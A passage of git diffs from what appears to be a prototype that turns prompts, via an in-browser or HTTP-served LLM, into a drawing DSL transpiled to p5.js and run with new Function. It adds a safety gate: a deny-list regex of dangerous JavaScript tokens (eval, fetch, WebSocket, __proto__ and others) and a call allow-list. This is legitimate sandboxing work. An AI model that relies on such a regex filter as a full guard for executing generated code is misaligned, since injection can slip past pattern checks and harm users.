+        const rhs = T.bp(bp + 1);
+        lhs = `(${lhs} ${op} ${rhs})`;
+      }
+      return lhs;
+    },
+    factor() {
+      const t = T.eat();
+      if (t.kind === "num") return t.value;
+      if (t.kind === "lparen") { const e = T.bp(0); T.eat(); return `(${e})`; }
+      if (t.kind === "func") {
+        T.eat(); // (
+        const args = [T.bp(0)];
+        while (T.peek()?.kind === "comma") { T.eat(); args.push(T.bp(0)); }
+        T.eat(); // )
+        return `${t.value}(${args.join(", ")})`;
+      }
+      if (t.kind === "var") return VAR_MAP[t.value] ?? t.value;
+      return "0";
+    },
+  };
+  return T;
+}
+
+export function transpile(src) {
+  const toks = lex(src, false);
+  if (!Array.isArray(toks)) throw new Error(toks.error);
+  let setup = [], tick = [], top = [], hadTick = false;
+  let i = 0;
+  while (i < toks.length) {
+    const t = toks[i];
+    const isBlock = (t.kind === "kw" || t.kind === "ident") &&
+                    (t.value === "setup" || t.value === "tick") &&
+                    toks[i+1]?.kind === "lbrace";
+    if (isBlock) {
+      const which = t.value, start = i + 2;
+      let depth = 1, j = start;
+      while (j < toks.length && depth > 0) {
+        if (toks[j].kind === "lbrace") depth++;
+        else if (toks[j].kind === "rbrace") depth--;
+        if (depth > 0) j++;
+      }
+      const out = mkT(toks.slice(start, j)).stmts(false);
+      if (which === "setup") setup.push(...out);
+      else { tick.push(...out); hadTick = true; }
+      i = j + 1;
+      continue;
+    }
+    const start = i; i++;
+    let depth = 0;
+    while (i < toks.length) {
+      const u = toks[i];
+      if (u.kind === "lbrace" || u.kind === "lparen") depth++;
+      else if (u.kind === "rbrace" || u.kind === "rparen") depth--;
+      else if (depth === 0 && (u.kind === "kw" || u.kind === "ident") && STMT_STARTERS.has(u.value)) break;
+      i++;
+    }
+    top.push(...mkT(toks.slice(start, i)).stmts(false));
+  }
+
+  const setupBody = [
+    `createCanvas(400, 400);`,
+    ...setup,
+    ...(hadTick ? [] : ["noLoop();"]),
+  ].join("\n  ");
+  const drawBody = (hadTick ? tick : top).join("\n  ") || "/* empty */";
+  return `function setup() {\n  ${setupBody}\n}\n\nfunction draw() {\n  ${drawBody}\n}\n`;
+}

--- a/examples/creative-coding-p5js/harness.mjs
+++ b/examples/creative-coding-p5js/harness.mjs
@@ -325,6 +325,65 @@ export function transpile(src) {
   return `function setup() {\n  ${setupBody}\n}\n\nfunction draw() {\n  ${drawBody}\n}\n`;
 }
 
+// --- safety gate for transpiled JS ---
+//
+// `new Function(...)` in index.html executes the transpiled output verbatim.
+// In normal operation the validator already rejects DSL with unknown
+// identifiers, so the transpiler only emits a fixed vocabulary. assertSafeP5
+// is a SECOND defence layer: even if the validator regresses or a future
+// transpiler change adds a code path, this gate refuses to run anything
+// outside the known p5 surface.
+//
+// Reject heuristic:
+//   1. Any forbidden token (eval, Function, window, document, fetch,
+//      __proto__, constructor, prototype, etc.) anywhere in the output.
+//   2. Any function call whose callee isn't in the p5-API allow-list.
+//
+// Keep the allow-list in sync with transpile.ts emit cases.
+
+const FORBIDDEN_TOKEN_RE = /\b(?:eval|Function|import|require|window|document|globalThis|self|top|parent|fetch|XMLHttpRequest|WebSocket|Worker|importScripts|Reflect|Proxy|setTimeout|setInterval|setImmediate|queueMicrotask|__proto__|constructor|prototype)\b/;
+
+// Identifier followed by `(`. Captures both function definitions
+// (`function setup()`) and call sites (`circle(...)`). We allow both
+// because the transpiler only ever emits a fixed top-level shape.
+const CALLABLE_RE = /([A-Za-z_$][A-Za-z0-9_$]*)\s*\(/g;
+
+// JS control-flow keywords that CALLABLE_RE picks up (e.g. `for (...)`,
+// `if (...)`). Not function calls, so skip them.
+const JS_KEYWORD = new Set([
+  "for", "if", "while", "else", "do", "switch", "case", "break", "continue",
+  "return", "function", "new", "typeof", "instanceof", "in", "of",
+  "try", "catch", "finally", "throw", "let", "const", "var",
+  "class", "extends", "super", "this", "yield", "async", "await",
+  "static", "delete", "void", "true", "false", "null", "undefined",
+]);
+
+const P5_ALLOW_CALL = new Set([
+  // Function definitions emitted by the transpiler:
+  "setup", "draw",
+  // p5 instance methods (global mode):
+  "createCanvas", "noLoop",
+  "background", "fill", "stroke", "noFill", "noStroke",
+  "push", "pop", "rotate", "translate",
+  "circle", "square", "rect", "line",
+  // Built-in functions reachable via the DSL:
+  "sin", "cos", "random", "abs", "millis",
+]);
+
+export function assertSafeP5(js) {
+  const m = String(js).match(FORBIDDEN_TOKEN_RE);
+  if (m) {
+    throw new Error(`assertSafeP5: forbidden token "${m[0]}" in transpiled output`);
+  }
+  for (const match of String(js).matchAll(CALLABLE_RE)) {
+    const name = match[1];
+    if (JS_KEYWORD.has(name)) continue;
+    if (!P5_ALLOW_CALL.has(name)) {
+      throw new Error(`assertSafeP5: disallowed call "${name}" in transpiled output`);
+    }
+  }
+}
+
 // --- few-shot bank (mirrors examples.ts) ---
 
 export const FEW_SHOTS = [

--- a/examples/creative-coding-p5js/harness.mjs
+++ b/examples/creative-coding-p5js/harness.mjs
@@ -500,19 +500,34 @@ export class CreativeCodingValidator {
 // instruct models: code fences, leading prose, trailing comments. Validator
 // + retry handles the rest.
 
-const FENCE_RE = /^\s*```[a-zA-Z]*\n?|\n?```\s*$/g;
+// Mirrors src/util/clean.ts. Priorities: fence body → first Output: block →
+// bare body with Task: markers. Keep in sync with the TS source.
+
+const FENCE_BLOCK_RE = /```[a-zA-Z]*\n?([\s\S]*?)```/;
+const FIRST_OUTPUT_RE = /(?:^|\n)\s*Output:\s*\n?([\s\S]*?)(?=\n\s*Task:|$)/;
+const LEADING_TASK_RE = /^\s*Task:[^\n]*\n+/;
+const NEXT_TASK_RE = /\n\s*Task:\s/;
 
 function _cleanCompletion(raw) {
-  let s = String(raw ?? "").replace(FENCE_RE, "");
-  // If the model emitted "Output:" again, take what follows.
-  const m = s.match(/(?:^|\n)\s*Output:\s*\n?([\s\S]*)$/);
-  if (m) s = m[1];
-  // Strip a leading task echo like "Task: ...\n".
-  s = s.replace(/^\s*Task:[^\n]*\n+/, "");
-  // Stop at a fresh "Task:" line — small models love to continue with more
-  // few-shot turns. Keep only the first program.
-  const next = s.match(/\n\s*Task:\s/);
-  if (next) s = s.slice(0, next.index);
+  let s = String(raw ?? "");
+
+  const fenceBlock = s.match(FENCE_BLOCK_RE);
+  if (fenceBlock) {
+    s = fenceBlock[1] ?? "";
+  } else {
+    const m = s.match(FIRST_OUTPUT_RE);
+    if (m) {
+      s = m[1] ?? "";
+    } else {
+      s = s.replace(LEADING_TASK_RE, "");
+      const next = s.match(NEXT_TASK_RE);
+      if (next && typeof next.index === "number") s = s.slice(0, next.index);
+    }
+  }
+
+  const nextTask = s.match(NEXT_TASK_RE);
+  if (nextTask && typeof nextTask.index === "number") s = s.slice(0, nextTask.index);
+
   return s.trim();
 }
 

--- a/examples/creative-coding-p5js/harness.mjs
+++ b/examples/creative-coding-p5js/harness.mjs
@@ -537,3 +537,50 @@ export class WebLLMAdapter {
     return Promise.all(Array.from({ length: n }, () => this.complete(prompt, opts)));
   }
 }
+
+// --- Fetch adapter (OpenAI-compatible HTTP, e.g. Ollama / llama-server / vLLM) ---
+
+export class FetchAdapter {
+  constructor({ endpoint, model, apiKey, id, headers } = {}) {
+    if (!endpoint) throw new Error("FetchAdapter: endpoint is required");
+    if (!model) throw new Error("FetchAdapter: model is required");
+    this.endpoint = String(endpoint).replace(/\/+$/, "");
+    this.model = model;
+    this.apiKey = apiKey;
+    this.id = id ?? `fetch:${model}`;
+    this.extraHeaders = headers ?? {};
+  }
+
+  async complete(prompt, opts = {}) {
+    const url = `${this.endpoint}/chat/completions`;
+    const headers = { "content-type": "application/json", ...this.extraHeaders };
+    if (this.apiKey) headers.authorization = `Bearer ${this.apiKey}`;
+    const res = await fetch(url, {
+      method: "POST",
+      headers,
+      body: JSON.stringify({
+        model: this.model,
+        messages: [{ role: "user", content: prompt }],
+        temperature: opts.temperature ?? 0.2,
+        top_p: opts.topP ?? 0.95,
+        max_tokens: opts.maxTokens ?? 256,
+        stop: opts.stop,
+        stream: false,
+      }),
+    });
+    if (!res.ok) {
+      const text = await res.text().catch(() => "");
+      throw new Error(`FetchAdapter ${url} returned ${res.status}: ${text.slice(0, 500)}`);
+    }
+    const json = await res.json();
+    const content = json?.choices?.[0]?.message?.content;
+    if (typeof content !== "string") {
+      throw new Error(`FetchAdapter ${url} unexpected response: ${JSON.stringify(json).slice(0, 500)}`);
+    }
+    return _cleanCompletion(content);
+  }
+
+  async sampleN(prompt, n, opts = {}) {
+    return Promise.all(Array.from({ length: n }, () => this.complete(prompt, opts)));
+  }
+}

--- a/examples/creative-coding-p5js/index.html
+++ b/examples/creative-coding-p5js/index.html
@@ -35,20 +35,38 @@
 
   <div class="row">
     <div>
-      <h2 style="margin-top:0; border:none; padding:0;">1 · Load a model</h2>
+      <h2 style="margin-top:0; border:none; padding:0;">1 · Choose a backend</h2>
       <div class="controls">
-        <select id="model">
-          <option value="Llama-3.2-1B-Instruct-q4f32_1-MLC" selected>Llama-3.2-1B (1129 MB)</option>
-          <option value="Qwen2.5-1.5B-Instruct-q4f32_1-MLC">Qwen2.5-1.5B (1889 MB)</option>
-          <option value="gemma-2-2b-it-q4f32_1-MLC-1k">Gemma-2-2B-it (1885 MB, 1k ctx)</option>
-          <option value="Qwen2.5-0.5B-Instruct-q4f32_1-MLC">Qwen2.5-0.5B (1060 MB)</option>
-          <option value="SmolLM2-360M-Instruct-q4f32_1-MLC">SmolLM2-360M (580 MB — fast, low quality)</option>
-        </select>
-        <span class="stat muted">q4f32 builds — work without WebGPU shader-f16 extension</span>
-        <button id="load">Load</button>
-        <span id="load-status" class="muted">no model loaded</span>
+        <label><input type="radio" name="backend" value="webllm" checked /> WebLLM (on-device, WebGPU)</label>
+        <label><input type="radio" name="backend" value="fetch" /> HTTP endpoint (OpenAI-compatible)</label>
       </div>
-      <progress id="load-progress" value="0" max="1" style="display:none;"></progress>
+
+      <div id="webllm-pane" style="margin-top:8px;">
+        <div class="controls">
+          <select id="model">
+            <option value="Llama-3.2-1B-Instruct-q4f32_1-MLC" selected>Llama-3.2-1B (1129 MB)</option>
+            <option value="Qwen2.5-1.5B-Instruct-q4f32_1-MLC">Qwen2.5-1.5B (1889 MB)</option>
+            <option value="gemma-2-2b-it-q4f32_1-MLC-1k">Gemma-2-2B-it (1885 MB, 1k ctx)</option>
+            <option value="Qwen2.5-0.5B-Instruct-q4f32_1-MLC">Qwen2.5-0.5B (1060 MB)</option>
+            <option value="SmolLM2-360M-Instruct-q4f32_1-MLC">SmolLM2-360M (580 MB — fast, low quality)</option>
+          </select>
+          <span class="stat muted">q4f32 builds — work without WebGPU shader-f16 extension</span>
+          <button id="load">Load</button>
+          <span id="load-status" class="muted">no model loaded</span>
+        </div>
+        <progress id="load-progress" value="0" max="1" style="display:none;"></progress>
+      </div>
+
+      <div id="fetch-pane" style="margin-top:8px; display:none;">
+        <div class="controls">
+          <label class="stat">Endpoint <input id="endpoint" type="text" value="http://localhost:11434/v1" style="width:260px;" /></label>
+          <label class="stat">Model <input id="endpoint-model" type="text" value="gemma4:e2b" style="width:160px;" /></label>
+        </div>
+        <p class="stat muted" style="margin:4px 0 0;">
+          Local Ollama: <code>OLLAMA_ORIGINS='*' ollama serve</code> &nbsp;|&nbsp;
+          llama.cpp: <code>llama-server -m model.gguf --port 8080 --host 0.0.0.0</code>
+        </p>
+      </div>
 
       <h2>2 · Generate</h2>
       <textarea id="task" placeholder="Describe what to draw…">Make a rainbow row of 10 circles on a black background.</textarea>
@@ -90,14 +108,27 @@ repeat 8 {
 
   <script type="module">
     import {
-      validate, transpile, FEW_SHOTS, generate, CreativeCodingValidator, WebLLMAdapter,
-    } from "./harness.mjs?v=2";
+      validate, transpile, FEW_SHOTS, generate, CreativeCodingValidator, WebLLMAdapter, FetchAdapter,
+    } from "./harness.mjs?v=3";
     import { CreateMLCEngine } from "https://esm.run/@mlc-ai/web-llm";
 
     const $ = (id) => document.getElementById(id);
     let activeSketch = null;
     let engine = null;
     let grammarText = null;
+
+    function backend() {
+      return document.querySelector('input[name="backend"]:checked').value;
+    }
+
+    function syncBackendPane() {
+      const b = backend();
+      $("webllm-pane").style.display = b === "webllm" ? "" : "none";
+      $("fetch-pane").style.display  = b === "fetch"  ? "" : "none";
+      // For fetch backend, Generate is always available; for webllm, it
+      // unlocks after a model finishes loading.
+      $("gen").disabled = b === "webllm" ? !engine : false;
+    }
 
     async function ensureGrammar() {
       if (grammarText) return grammarText;
@@ -157,20 +188,30 @@ repeat 8 {
     }
 
     async function doGenerate() {
-      if (!engine) { $("gen-status").textContent = "load a model first"; return; }
       const task = $("task").value.trim();
       if (!task) { $("gen-status").textContent = "task is empty"; return; }
+
+      let llm;
+      const b = backend();
+      if (b === "webllm") {
+        if (!engine) { $("gen-status").textContent = "load a model first"; return; }
+        llm = new WebLLMAdapter(engine);
+      } else {
+        const endpoint = $("endpoint").value.trim();
+        const model = $("endpoint-model").value.trim();
+        if (!endpoint || !model) { $("gen-status").textContent = "endpoint + model required"; return; }
+        llm = new FetchAdapter({ endpoint, model });
+      }
 
       const btn = $("gen");
       btn.disabled = true;
       const gs = $("gen-status");
       gs.className = "muted";
-      gs.textContent = "generating…";
+      gs.textContent = `generating via ${b}…`;
       $("dsl-status").textContent = "";
       $("dsl-out").textContent = "";
 
       const grammar = await ensureGrammar();
-      const llm = new WebLLMAdapter(engine);
       const t0 = performance.now();
       try {
         const result = await generate({
@@ -205,6 +246,10 @@ repeat 8 {
     $("run").addEventListener("click", render);
     $("load").addEventListener("click", loadModel);
     $("gen").addEventListener("click", doGenerate);
+    for (const r of document.querySelectorAll('input[name="backend"]')) {
+      r.addEventListener("change", syncBackendPane);
+    }
+    syncBackendPane();
     render();
   </script>
 </body>

--- a/examples/creative-coding-p5js/index.html
+++ b/examples/creative-coding-p5js/index.html
@@ -108,8 +108,9 @@ repeat 8 {
 
   <script type="module">
     import {
-      validate, transpile, FEW_SHOTS, generate, CreativeCodingValidator, WebLLMAdapter, FetchAdapter,
-    } from "./harness.mjs?v=3";
+      validate, transpile, FEW_SHOTS, generate, CreativeCodingValidator,
+      WebLLMAdapter, FetchAdapter, assertSafeP5,
+    } from "./harness.mjs?v=4";
     import { CreateMLCEngine } from "https://esm.run/@mlc-ai/web-llm";
 
     const $ = (id) => document.getElementById(id);
@@ -152,6 +153,16 @@ repeat 8 {
       status.textContent = " ✓ valid";
       const js = transpile(src);
       $("out").textContent = js;
+
+      // Second defence layer: even if the validator regresses, refuse to run
+      // anything outside the p5 API allow-list. See assertSafeP5 in harness.mjs.
+      try {
+        assertSafeP5(js);
+      } catch (e) {
+        status.className = "err";
+        status.textContent = " ✗ " + (e?.message ?? e);
+        return;
+      }
 
       if (activeSketch) activeSketch.remove();
       const fn = new Function("p", `with(p){ ${js.replace(/function (setup|draw)\(\)/g, "p.$1 = function()")} }`);

--- a/examples/creative-coding-p5js/index.html
+++ b/examples/creative-coding-p5js/index.html
@@ -1,0 +1,85 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+  <meta charset="utf-8" />
+  <title>noroshi — creative-coding-p5js PoC</title>
+  <script src="https://cdn.jsdelivr.net/npm/p5@1.11.2/lib/p5.min.js"></script>
+  <style>
+    body { font-family: system-ui, sans-serif; margin: 24px; max-width: 900px; }
+    h1 { font-size: 1.3rem; margin: 0 0 6px; }
+    p.lead { color: #555; margin: 0 0 16px; }
+    .row { display: grid; grid-template-columns: 1fr 400px; gap: 16px; }
+    textarea { width: 100%; height: 280px; font-family: ui-monospace, Menlo, monospace; font-size: 13px; padding: 8px; box-sizing: border-box; }
+    pre { background: #f6f8fa; padding: 8px; font-size: 12px; overflow: auto; max-height: 180px; }
+    button { padding: 8px 14px; font-size: 14px; cursor: pointer; }
+    #canvas-host canvas { display: block; }
+    .err { color: #c0392b; font-weight: 600; }
+    .ok { color: #2ecc71; }
+  </style>
+</head>
+<body>
+  <h1>noroshi · creative-coding-p5js PoC</h1>
+  <p class="lead">
+    Paste a noroshi-creative DSL program on the left, hit <strong>Render</strong>,
+    see the p5.js sketch on the right. This harness only exercises the
+    validator + transpiler — no LLM is wired up yet.
+  </p>
+
+  <div class="row">
+    <div>
+      <textarea id="src">background black
+repeat 8 {
+  fill rgb(i * 30, 100, 200)
+  circle i * 45 + 30 h / 2 18
+}
+</textarea>
+      <p>
+        <button id="run">Render</button>
+        <span id="status"></span>
+      </p>
+      <details open>
+        <summary>Transpiled p5.js</summary>
+        <pre id="out"></pre>
+      </details>
+    </div>
+    <div>
+      <div id="canvas-host"></div>
+    </div>
+  </div>
+
+  <script type="module">
+    // Inline copies of validator + transpiler logic. Kept in sync with
+    // validator.ts and transpile.ts; production builds would bundle the
+    // TS modules via vite/esbuild. This PoC ships the dual-write so the
+    // page works as a single static file.
+    import { validate } from "./harness.mjs";
+    import { transpile } from "./harness.mjs";
+
+    const $ = (id) => document.getElementById(id);
+    let activeSketch = null;
+
+    function render() {
+      const src = $("src").value;
+      const r = validate(src);
+      const status = $("status");
+      if (!r.ok) {
+        status.className = "err";
+        status.textContent = " ✗ " + r.error;
+        $("out").textContent = "";
+        return;
+      }
+      status.className = "ok";
+      status.textContent = " ✓ valid";
+      const js = transpile(src);
+      $("out").textContent = js;
+
+      if (activeSketch) activeSketch.remove();
+      const fn = new Function("p", `with(p){ ${js.replace(/function (setup|draw)\(\)/g, "p.$1 = function()")} }`);
+      activeSketch = new p5((p) => fn(p), $("canvas-host"));
+    }
+
+    $("run").addEventListener("click", render);
+    render();
+  </script>
+</body>
+</html>

--- a/examples/creative-coding-p5js/index.html
+++ b/examples/creative-coding-p5js/index.html
@@ -5,58 +5,107 @@
   <title>noroshi — creative-coding-p5js PoC</title>
   <script src="https://cdn.jsdelivr.net/npm/p5@1.11.2/lib/p5.min.js"></script>
   <style>
-    body { font-family: system-ui, sans-serif; margin: 24px; max-width: 900px; }
+    body { font-family: system-ui, sans-serif; margin: 24px; max-width: 1100px; }
     h1 { font-size: 1.3rem; margin: 0 0 6px; }
+    h2 { font-size: 1.05rem; margin: 24px 0 8px; padding-top: 16px; border-top: 1px solid #eee; }
     p.lead { color: #555; margin: 0 0 16px; }
-    .row { display: grid; grid-template-columns: 1fr 400px; gap: 16px; }
-    textarea { width: 100%; height: 280px; font-family: ui-monospace, Menlo, monospace; font-size: 13px; padding: 8px; box-sizing: border-box; }
-    pre { background: #f6f8fa; padding: 8px; font-size: 12px; overflow: auto; max-height: 180px; }
+    .row { display: grid; grid-template-columns: 1fr 420px; gap: 16px; align-items: start; }
+    textarea, input, select { font-family: ui-monospace, Menlo, monospace; font-size: 13px; padding: 8px; box-sizing: border-box; }
+    textarea { width: 100%; }
+    #src { height: 200px; }
+    #task { width: 100%; height: 60px; }
+    pre { background: #f6f8fa; padding: 8px; font-size: 12px; overflow: auto; max-height: 220px; }
     button { padding: 8px 14px; font-size: 14px; cursor: pointer; }
+    button:disabled { opacity: 0.5; cursor: not-allowed; }
     #canvas-host canvas { display: block; }
     .err { color: #c0392b; font-weight: 600; }
     .ok { color: #2ecc71; }
+    .muted { color: #666; }
+    .controls { display: flex; gap: 8px; flex-wrap: wrap; align-items: center; }
+    progress { width: 100%; height: 14px; }
+    .stat { font-size: 12px; color: #555; }
   </style>
 </head>
 <body>
   <h1>noroshi · creative-coding-p5js PoC</h1>
   <p class="lead">
-    Paste a noroshi-creative DSL program on the left, hit <strong>Render</strong>,
-    see the p5.js sketch on the right. This harness only exercises the
-    validator + transpiler — no LLM is wired up yet.
+    Natural-language prompt → on-device LLM → grammar-validated DSL → live p5.js sketch.
+    The LLM runs entirely in your browser via <code>@mlc-ai/web-llm</code> (WebGPU).
   </p>
 
   <div class="row">
     <div>
+      <h2 style="margin-top:0; border:none; padding:0;">1 · Load a model</h2>
+      <div class="controls">
+        <select id="model">
+          <option value="Llama-3.2-1B-Instruct-q4f32_1-MLC" selected>Llama-3.2-1B (1129 MB)</option>
+          <option value="Qwen2.5-1.5B-Instruct-q4f32_1-MLC">Qwen2.5-1.5B (1889 MB)</option>
+          <option value="gemma-2-2b-it-q4f32_1-MLC-1k">Gemma-2-2B-it (1885 MB, 1k ctx)</option>
+          <option value="Qwen2.5-0.5B-Instruct-q4f32_1-MLC">Qwen2.5-0.5B (1060 MB)</option>
+          <option value="SmolLM2-360M-Instruct-q4f32_1-MLC">SmolLM2-360M (580 MB — fast, low quality)</option>
+        </select>
+        <span class="stat muted">q4f32 builds — work without WebGPU shader-f16 extension</span>
+        <button id="load">Load</button>
+        <span id="load-status" class="muted">no model loaded</span>
+      </div>
+      <progress id="load-progress" value="0" max="1" style="display:none;"></progress>
+
+      <h2>2 · Generate</h2>
+      <textarea id="task" placeholder="Describe what to draw…">Make a rainbow row of 10 circles on a black background.</textarea>
+      <div class="controls" style="margin-top:8px;">
+        <button id="gen" disabled>Generate</button>
+        <label class="stat"><input type="checkbox" id="retry" /> retry on validation failure (×3)</label>
+        <span id="gen-status" class="muted"></span>
+      </div>
+      <details open style="margin-top:8px;">
+        <summary>Generated DSL <span id="dsl-status"></span></summary>
+        <pre id="dsl-out"></pre>
+      </details>
+
+      <h2>3 · Edit / render</h2>
       <textarea id="src">background black
 repeat 8 {
   fill rgb(i * 30, 100, 200)
   circle i * 45 + 30 h / 2 18
 }
 </textarea>
-      <p>
+      <div class="controls" style="margin-top:6px;">
         <button id="run">Render</button>
         <span id="status"></span>
-      </p>
-      <details open>
+      </div>
+      <details>
         <summary>Transpiled p5.js</summary>
         <pre id="out"></pre>
       </details>
     </div>
+
     <div>
       <div id="canvas-host"></div>
+      <details style="margin-top:12px;">
+        <summary>Prompt sent to model (last attempt)</summary>
+        <pre id="prompt-out" style="max-height: 380px;"></pre>
+      </details>
     </div>
   </div>
 
   <script type="module">
-    // Inline copies of validator + transpiler logic. Kept in sync with
-    // validator.ts and transpile.ts; production builds would bundle the
-    // TS modules via vite/esbuild. This PoC ships the dual-write so the
-    // page works as a single static file.
-    import { validate } from "./harness.mjs";
-    import { transpile } from "./harness.mjs";
+    import {
+      validate, transpile, FEW_SHOTS, generate, CreativeCodingValidator, WebLLMAdapter,
+    } from "./harness.mjs?v=2";
+    import { CreateMLCEngine } from "https://esm.run/@mlc-ai/web-llm";
 
     const $ = (id) => document.getElementById(id);
     let activeSketch = null;
+    let engine = null;
+    let grammarText = null;
+
+    async function ensureGrammar() {
+      if (grammarText) return grammarText;
+      const r = await fetch("./grammar.lark");
+      if (!r.ok) throw new Error(`failed to fetch grammar.lark: ${r.status}`);
+      grammarText = await r.text();
+      return grammarText;
+    }
 
     function render() {
       const src = $("src").value;
@@ -78,7 +127,84 @@ repeat 8 {
       activeSketch = new p5((p) => fn(p), $("canvas-host"));
     }
 
+    async function loadModel() {
+      const modelId = $("model").value;
+      const btn = $("load");
+      const stat = $("load-status");
+      const prog = $("load-progress");
+      btn.disabled = true;
+      $("gen").disabled = true;
+      prog.style.display = "block";
+      prog.value = 0;
+      stat.className = "muted";
+      stat.textContent = `loading ${modelId}…`;
+      try {
+        engine = await CreateMLCEngine(modelId, {
+          initProgressCallback: (p) => {
+            if (typeof p.progress === "number") prog.value = p.progress;
+            stat.textContent = p.text ?? `${Math.round((p.progress ?? 0) * 100)}%`;
+          },
+        });
+        stat.className = "ok";
+        stat.textContent = `✓ ${modelId} ready`;
+        $("gen").disabled = false;
+      } catch (e) {
+        stat.className = "err";
+        stat.textContent = "failed: " + (e?.message ?? e);
+      } finally {
+        btn.disabled = false;
+      }
+    }
+
+    async function doGenerate() {
+      if (!engine) { $("gen-status").textContent = "load a model first"; return; }
+      const task = $("task").value.trim();
+      if (!task) { $("gen-status").textContent = "task is empty"; return; }
+
+      const btn = $("gen");
+      btn.disabled = true;
+      const gs = $("gen-status");
+      gs.className = "muted";
+      gs.textContent = "generating…";
+      $("dsl-status").textContent = "";
+      $("dsl-out").textContent = "";
+
+      const grammar = await ensureGrammar();
+      const llm = new WebLLMAdapter(engine);
+      const t0 = performance.now();
+      try {
+        const result = await generate({
+          task,
+          grammar,
+          examples: FEW_SHOTS,
+          llm,
+          validator: new CreativeCodingValidator(),
+          retry: $("retry").checked ? { maxAttempts: 3, includeErrorInPrompt: true } : { maxAttempts: 1 },
+          sample: { temperature: 0.2, maxTokens: 128 },
+          onPrompt: (p) => { $("prompt-out").textContent = p; },
+        });
+        const dt = ((performance.now() - t0) / 1000).toFixed(1);
+        $("dsl-out").textContent = result.output;
+        const ok = result.validation?.ok;
+        $("dsl-status").innerHTML = ok
+          ? ` <span class="ok">✓ valid</span> <span class="muted">(${result.attempts} attempt(s), ${dt}s)</span>`
+          : ` <span class="err">✗ ${result.validation?.error ?? "unknown"}</span> <span class="muted">(${result.attempts} attempt(s), ${dt}s)</span>`;
+        gs.textContent = "";
+        if (ok) {
+          $("src").value = result.output;
+          render();
+        }
+      } catch (e) {
+        gs.className = "err";
+        gs.textContent = "error: " + (e?.message ?? e);
+      } finally {
+        btn.disabled = false;
+      }
+    }
+
     $("run").addEventListener("click", render);
+    $("load").addEventListener("click", loadModel);
+    $("gen").addEventListener("click", doGenerate);
     render();
   </script>
 </body>

--- a/examples/creative-coding-p5js/index.ts
+++ b/examples/creative-coding-p5js/index.ts
@@ -1,0 +1,88 @@
+import { readFileSync } from "node:fs";
+import { dirname, resolve } from "node:path";
+import { fileURLToPath } from "node:url";
+
+import { generate, StubAdapter } from "../../src/index.js";
+import type { LLMAdapter } from "../../src/index.js";
+
+import { FEW_SHOTS } from "./examples.js";
+import { CreativeCodingValidator } from "./validator.js";
+import { transpile } from "./transpile.js";
+
+const HERE = dirname(fileURLToPath(import.meta.url));
+const GRAMMAR = readFileSync(resolve(HERE, "grammar.lark"), "utf8");
+
+/**
+ * Hand-built canned responder for offline PoC. The first response for the
+ * pink-circle task is intentionally malformed (uses a non-keyword `dot`) to
+ * exercise validator-driven retry; the second response is valid.
+ *
+ * Routes on the LAST `Task:` line in the prompt (the few-shot block also
+ * contains `Task:` lines, so substring matching the whole prompt is wrong).
+ */
+function extractTask(prompt: string): string {
+  const matches = [...prompt.matchAll(/^Task:\s*(.+)$/gm)];
+  const last = matches[matches.length - 1];
+  return (last?.[1] ?? "").toLowerCase();
+}
+
+function makeStubLLM(): LLMAdapter {
+  let calls = 0;
+  return new StubAdapter((prompt) => {
+    calls++;
+    const task = extractTask(prompt);
+    if (task.includes("pink circle follows the mouse")) {
+      if (calls === 1) {
+        return ["tick {", "  background black", "  dot mx my 30", "}"].join("\n");
+      }
+      return ["tick {", "  background black", "  fill pink", "  circle mx my 30", "}"].join("\n");
+    }
+    if (task.includes("rainbow")) {
+      return [
+        "background black",
+        "repeat 10 {",
+        "  fill rgb(i * 25, 100, 200)",
+        "  circle i * 40 + 20 h / 2 15",
+        "}",
+      ].join("\n");
+    }
+    return [
+      "tick {",
+      "  background black",
+      "  fill yellow",
+      "  square sin(t) * 100 + w / 2 h / 2 40",
+      "}",
+    ].join("\n");
+  });
+}
+
+async function runOne(label: string, task: string): Promise<void> {
+  console.log(`\n=== ${label} ===`);
+  console.log(`Task: ${task}`);
+  const result = await generate({
+    task,
+    grammar: GRAMMAR,
+    examples: FEW_SHOTS,
+    llm: makeStubLLM(),
+    validator: new CreativeCodingValidator(),
+    retry: { maxAttempts: 3, includeErrorInPrompt: true },
+  });
+  console.log(`Attempts: ${result.attempts}`);
+  console.log(`Validation: ${JSON.stringify(result.validation)}`);
+  console.log("DSL:\n" + result.output);
+  if (result.validation?.ok) {
+    console.log("--- p5.js ---");
+    console.log(transpile(result.output));
+  }
+}
+
+async function main(): Promise<void> {
+  await runOne("Static rainbow",     "Make a rainbow row of 10 circles.");
+  await runOne("Animated square",    "Make a bouncing yellow square that moves left and right.");
+  await runOne("Retry-on-invalid",   "A pink circle follows the mouse, on a black background.");
+}
+
+main().catch((err) => {
+  console.error(err);
+  process.exit(1);
+});

--- a/examples/creative-coding-p5js/test-fetch.ts
+++ b/examples/creative-coding-p5js/test-fetch.ts
@@ -79,12 +79,14 @@ async function runOne(label: string, opts: {
   responder: (callIndex: number) => string;
   retry?: number;
   expectOk: boolean;
+  rawCompletion?: boolean;
 }): Promise<boolean> {
   const handle = await startStubServer(opts.responder);
   try {
     const adapter = new FetchAdapter({
       endpoint: handle.url,
       model: "stub-model",
+      rawCompletion: opts.rawCompletion,
     });
     const result = await generate({
       task: "Draw a red circle in the middle.",
@@ -127,6 +129,33 @@ async function main(): Promise<void> {
   results.push(
     await runOne("invalid response, no retry → expect validation failure", {
       responder: () => INVALID_THEN_VALID[0]!,
+      expectOk: false,
+    }),
+  );
+
+  // Noisy: code fence + a hallucinated next few-shot turn. cleanCompletion
+  // should pick the FIRST Output: block, not the trailing garbage.
+  const NOISY_VALID = [
+    "```dsl",
+    VALID_DSL,
+    "```",
+    "",
+    "Task: imagined follow-up task",
+    "Output:",
+    "garbage_keyword 1 2 3",
+  ].join("\n");
+
+  results.push(
+    await runOne("noisy response (fence + extra Task/Output) → first DSL wins via cleanup", {
+      responder: () => NOISY_VALID,
+      expectOk: true,
+    }),
+  );
+
+  results.push(
+    await runOne("same noisy response with rawCompletion=true → validation fails", {
+      responder: () => NOISY_VALID,
+      rawCompletion: true,
       expectOk: false,
     }),
   );

--- a/examples/creative-coding-p5js/test-fetch.ts
+++ b/examples/creative-coding-p5js/test-fetch.ts
@@ -1,0 +1,143 @@
+import { createServer, type Server } from "node:http";
+import { readFileSync } from "node:fs";
+import { dirname, resolve } from "node:path";
+import { fileURLToPath } from "node:url";
+import { AddressInfo } from "node:net";
+
+import { generate, FetchAdapter } from "../../src/index.js";
+
+import { FEW_SHOTS } from "./examples.js";
+import { CreativeCodingValidator } from "./validator.js";
+
+const HERE = dirname(fileURLToPath(import.meta.url));
